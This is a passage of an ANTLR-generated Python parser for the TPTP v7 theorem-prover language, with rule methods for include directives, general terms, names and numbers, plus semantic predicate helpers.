self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
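# assumptions_record: 'assumptions([name_list])' (TPTP v7 syntax).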
class Assumptions_recordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Name_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_assumptions_record
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssumptions_record" ):
listener.enterAssumptions_record(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssumptions_record" ):
listener.exitAssumptions_record(self)
def assumptions_record(self):
localctx = tptp_v7_0_0_0Parser.Assumptions_recordContext(self, self._ctx, self.state)
self.enterRule(localctx, 362, self.RULE_assumptions_record)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1515
self.match(tptp_v7_0_0_0Parser.T__34)
self.state = 1516
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1517
self.name_list()
self.state = 1518
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1519
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
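# refutation: 'refutation(file_source)'.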
class RefutationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_sourceContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_refutation
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRefutation" ):
listener.enterRefutation(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRefutation" ):
listener.exitRefutation(self)
def refutation(self):
localctx = tptp_v7_0_0_0Parser.RefutationContext(self, self._ctx, self.state)
self.enterRule(localctx, 364, self.RULE_refutation)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1521
self.match(tptp_v7_0_0_0Parser.T__35)
self.state = 1522
self.file_source()
self.state = 1523
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
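# new_symbol_record: 'new_symbols(atomic_word, [new_symbol_list])' (TPTP v7 syntax).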
class New_symbol_recordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def new_symbol_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.New_symbol_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_new_symbol_record
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNew_symbol_record" ):
listener.enterNew_symbol_record(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNew_symbol_record" ):
listener.exitNew_symbol_record(self)
def new_symbol_record(self):
localctx = tptp_v7_0_0_0Parser.New_symbol_recordContext(self, self._ctx, self.state)
self.enterRule(localctx, 366, self.RULE_new_symbol_record)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1525
self.match(tptp_v7_0_0_0Parser.T__36)
self.state = 1526
self.atomic_word()
self.state = 1527
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1528
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1529
self.new_symbol_list()
self.state = 1530
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1531
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
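# new_symbol_list: one or more <principal_symbol> entries separated by ','.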
class New_symbol_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def principal_symbol(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Principal_symbolContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Principal_symbolContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_new_symbol_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNew_symbol_list" ):
listener.enterNew_symbol_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNew_symbol_list" ):
listener.exitNew_symbol_list(self)
def new_symbol_list(self):
localctx = tptp_v7_0_0_0Parser.New_symbol_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 368, self.RULE_new_symbol_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1533
self.principal_symbol()
self.state = 1538
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1534
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1535
self.principal_symbol()
self.state = 1540
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
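# principal_symbol: a <functor> or a <variable>.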
class Principal_symbolContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_principal_symbol
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPrincipal_symbol" ):
listener.enterPrincipal_symbol(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPrincipal_symbol" ):
listener.exitPrincipal_symbol(self)
def principal_symbol(self):
localctx = tptp_v7_0_0_0Parser.Principal_symbolContext(self, self._ctx, self.state)
self.enterRule(localctx, 370, self.RULE_principal_symbol)
try:
self.state = 1543
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1541
self.functor()
pass
elif token in [tptp_v7_0_0_0Parser.Upper_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1542
self.variable()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
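# include: an 'include(file_name[, formula_selection]).' directive.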
class IncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_nameContext,0)
def formula_selection(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_selectionContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_include
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInclude" ):
listener.enterInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInclude" ):
listener.exitInclude(self)
def include(self):
localctx = tptp_v7_0_0_0Parser.IncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 372, self.RULE_include)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1545
self.match(tptp_v7_0_0_0Parser.T__37)
self.state = 1546
self.file_name()
self.state = 1548
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1547
self.formula_selection()
self.state = 1550
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
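# formula_selection: ',' '[' name_list ']' — restricts an include to the named formulae.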
class Formula_selectionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Name_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_selection
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_selection" ):
listener.enterFormula_selection(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_selection" ):
listener.exitFormula_selection(self)
def formula_selection(self):
localctx = tptp_v7_0_0_0Parser.Formula_selectionContext(self, self._ctx, self.state)
self.enterRule(localctx, 374, self.RULE_formula_selection)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1552
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1553
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1554
self.name_list()
self.state = 1555
self.match(tptp_v7_0_0_0Parser.T__12)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
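# name_list: one or more <name> entries separated by ','.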
class Name_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.NameContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_name_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterName_list" ):
listener.enterName_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitName_list" ):
listener.exitName_list(self)
def name_list(self):
localctx = tptp_v7_0_0_0Parser.Name_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 376, self.RULE_name_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1557
self.name()
self.state = 1562
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1558
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1559
self.name()
self.state = 1564
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
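# general_term: a <general_data>, a <general_data> ':' <general_term> pair, or a <general_list>.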
class General_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_data(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_dataContext,0)
def general_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termContext,0)
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_term" ):
listener.enterGeneral_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_term" ):
listener.exitGeneral_term(self)
def general_term(self):
localctx = tptp_v7_0_0_0Parser.General_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 378, self.RULE_general_term)
try:
self.state = 1571
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,119,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1565
self.general_data()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1566
self.general_data()
self.state = 1567
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1568
self.general_term()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1570
self.general_list()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
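# general_data: an atomic_word, general_function, variable, number, Distinct_object, or formula_data.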
class General_dataContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def general_function(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_functionContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def number(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NumberContext,0)
def Distinct_object(self):
return self.getToken(tptp_v7_0_0_0Parser.Distinct_object, 0)
def formula_data(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_dataContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_data
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_data" ):
listener.enterGeneral_data(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_data" ):
listener.exitGeneral_data(self)
def general_data(self):
localctx = tptp_v7_0_0_0Parser.General_dataContext(self, self._ctx, self.state)
self.enterRule(localctx, 380, self.RULE_general_data)
try:
self.state = 1579
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,120,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1573
self.atomic_word()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1574
self.general_function()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1575
self.variable()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1576
self.number()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 1577
self.match(tptp_v7_0_0_0Parser.Distinct_object)
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 1578
self.formula_data()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
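# general_function: atomic_word '(' general_terms ')'.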
class General_functionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def general_terms(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_function
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_function" ):
listener.enterGeneral_function(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_function" ):
listener.exitGeneral_function(self)
def general_function(self):
localctx = tptp_v7_0_0_0Parser.General_functionContext(self, self._ctx, self.state)
self.enterRule(localctx, 382, self.RULE_general_function)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1581
self.atomic_word()
self.state = 1582
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1583
self.general_terms()
self.state = 1584
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
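# formula_data: a formula or term wrapped in '$thf(...)', '$tff(...)', '$fof(...)', '$cnf(...)', or '$fot(...)'.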
class Formula_dataContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formulaContext,0)
def tff_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formulaContext,0)
def fof_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formulaContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def fof_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_data
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_data" ):
listener.enterFormula_data(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_data" ):
listener.exitFormula_data(self)
def formula_data(self):
localctx = tptp_v7_0_0_0Parser.Formula_dataContext(self, self._ctx, self.state)
self.enterRule(localctx, 384, self.RULE_formula_data)
try:
self.state = 1606
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__38]:
self.enterOuterAlt(localctx, 1)
self.state = 1586
self.match(tptp_v7_0_0_0Parser.T__38)
self.state = 1587
self.thf_formula()
self.state = 1588
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__39]:
self.enterOuterAlt(localctx, 2)
self.state = 1590
self.match(tptp_v7_0_0_0Parser.T__39)
self.state = 1591
self.tff_formula()
self.state = 1592
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__40]:
self.enterOuterAlt(localctx, 3)
self.state = 1594
self.match(tptp_v7_0_0_0Parser.T__40)
self.state = 1595
self.fof_formula()
self.state = 1596
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__41]:
self.enterOuterAlt(localctx, 4)
self.state = 1598
self.match(tptp_v7_0_0_0Parser.T__41)
self.state = 1599
self.cnf_formula()
self.state = 1600
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__42]:
self.enterOuterAlt(localctx, 5)
self.state = 1602
self.match(tptp_v7_0_0_0Parser.T__42)
self.state = 1603
self.fof_term()
self.state = 1604
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
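# general_list: '[]' or '[' general_terms ']'.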
class General_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_terms(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_list" ):
listener.enterGeneral_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_list" ):
listener.exitGeneral_list(self)
def general_list(self):
localctx = tptp_v7_0_0_0Parser.General_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 386, self.RULE_general_list)
try:
self.state = 1613
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1608
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 1609
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1610
self.general_terms()
self.state = 1611
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
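# general_terms: one or more <general_term> entries separated by ','.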
class General_termsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.General_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_terms
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_terms" ):
listener.enterGeneral_terms(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_terms" ):
listener.exitGeneral_terms(self)
def general_terms(self):
localctx = tptp_v7_0_0_0Parser.General_termsContext(self, self._ctx, self.state)
self.enterRule(localctx, 388, self.RULE_general_terms)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1615
self.general_term()
self.state = 1620
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1616
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1617
self.general_term()
self.state = 1622
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
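# name: an <atomic_word> or an Integer token.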
class NameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def Integer(self):
return self.getToken(tptp_v7_0_0_0Parser.Integer, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterName" ):
listener.enterName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitName" ):
listener.exitName(self)
def name(self):
localctx = tptp_v7_0_0_0Parser.NameContext(self, self._ctx, self.state)
self.enterRule(localctx, 390, self.RULE_name)
try:
self.state = 1625
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1623
self.atomic_word()
pass
elif token in [tptp_v7_0_0_0Parser.Integer]:
self.enterOuterAlt(localctx, 2)
self.state = 1624
self.match(tptp_v7_0_0_0Parser.Integer)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Atomic_wordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def Single_quoted(self):
return self.getToken(tptp_v7_0_0_0Parser.Single_quoted, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atomic_word
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomic_word" ):
listener.enterAtomic_word(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomic_word" ):
listener.exitAtomic_word(self)
def atomic_word(self):
localctx = tptp_v7_0_0_0Parser.Atomic_wordContext(self, self._ctx, self.state)
self.enterRule(localctx, 392, self.RULE_atomic_word)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1627
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Lower_word or _la==tptp_v7_0_0_0Parser.Single_quoted):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Atomic_defined_wordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atomic_defined_word
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomic_defined_word" ):
listener.enterAtomic_defined_word(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomic_defined_word" ):
listener.exitAtomic_defined_word(self)
def atomic_defined_word(self):
localctx = tptp_v7_0_0_0Parser.Atomic_defined_wordContext(self, self._ctx, self.state)
self.enterRule(localctx, 394, self.RULE_atomic_defined_word)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1629
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Atomic_system_wordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atomic_system_word
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomic_system_word" ):
listener.enterAtomic_system_word(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomic_system_word" ):
listener.exitAtomic_system_word(self)
def atomic_system_word(self):
localctx = tptp_v7_0_0_0Parser.Atomic_system_wordContext(self, self._ctx, self.state)
self.enterRule(localctx, 396, self.RULE_atomic_system_word)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1631
self.match(tptp_v7_0_0_0Parser.Dollar_dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class NumberContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Integer(self):
return self.getToken(tptp_v7_0_0_0Parser.Integer, 0)
def Rational(self):
return self.getToken(tptp_v7_0_0_0Parser.Rational, 0)
def Real(self):
return self.getToken(tptp_v7_0_0_0Parser.Real, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_number
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNumber" ):
listener.enterNumber(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNumber" ):
listener.exitNumber(self)
def number(self):
localctx = tptp_v7_0_0_0Parser.NumberContext(self, self._ctx, self.state)
self.enterRule(localctx, 398, self.RULE_number)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1633
_la = self._input.LA(1)
if not(((((_la - 74)) & ~0x3f) == 0 and ((1 << (_la - 74)) & ((1 << (tptp_v7_0_0_0Parser.Real - 74)) | (1 << (tptp_v7_0_0_0Parser.Rational - 74)) | (1 << (tptp_v7_0_0_0Parser.Integer - 74)))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class File_nameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Single_quoted(self):
return self.getToken(tptp_v7_0_0_0Parser.Single_quoted, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_file_name
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFile_name" ):
listener.enterFile_name(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFile_name" ):
listener.exitFile_name(self)
def file_name(self):
localctx = tptp_v7_0_0_0Parser.File_nameContext(self, self._ctx, self.state)
self.enterRule(localctx, 400, self.RULE_file_name)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1635
self.match(tptp_v7_0_0_0Parser.Single_quoted)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
if self._predicates == None:
self._predicates = dict()
self._predicates[18] = self.thf_or_formula_sempred
self._predicates[19] = self.thf_and_formula_sempred
self._predicates[20] = self.thf_apply_formula_sempred
self._predicates[42] = self.thf_xprod_type_sempred
self._predicates[43] = self.thf_union_type_sempred
self._predicates[54] = self.tff_or_formula_sempred
self._predicates[55] = self.tff_and_formula_sempred
self._predicates[85] = self.tff_xprod_type_sempred
self._predicates[94] = self.fof_or_formula_sempred
self._predicates[95] = self.fof_and_formula_sempred
self._predicates[122] = self.cnf_disjunction_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def thf_or_formula_sempred(self, localctx:Thf_or_formulaContext, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 1)
def thf_and_formula_sempred(self, localctx:Thf_and_formulaContext, predIndex:int):
if predIndex == 1:
return self.precpred(self._ctx, 1)
def thf_apply_formula_sempred(self, localctx:Thf_apply_formulaContext, predIndex:int):
if predIndex == 2:
return self.precpred(self._ctx, 1)
def thf_xprod_type_sempred(self, localctx:Thf_xprod_typeContext, predIndex:int):
if predIndex == 3:
return self.precpred(self._ctx, 1)
def thf_union_type_sempred(self, localctx:Thf_union_typeContext, predIndex:int):
if predIndex == 4:
return self.precpred(self._ctx, 1)
def tff_or_formula_sempred(self, localctx:Tff_or_formulaContext, predIndex:int):
if predIndex == 5:
return self.precpred(self._ctx, 1)
def tff_and_formula_sempred(self, localctx:Tff_and_formulaContext, predIndex:int):
if predIndex == 6:
return self.precpred(self._ctx, 1)
def tff_xprod_type_sempred(self, localctx:Tff_xprod_typeContext, predIndex:int):
if predIndex == 7:
return self.precpred(self._ctx, 1)
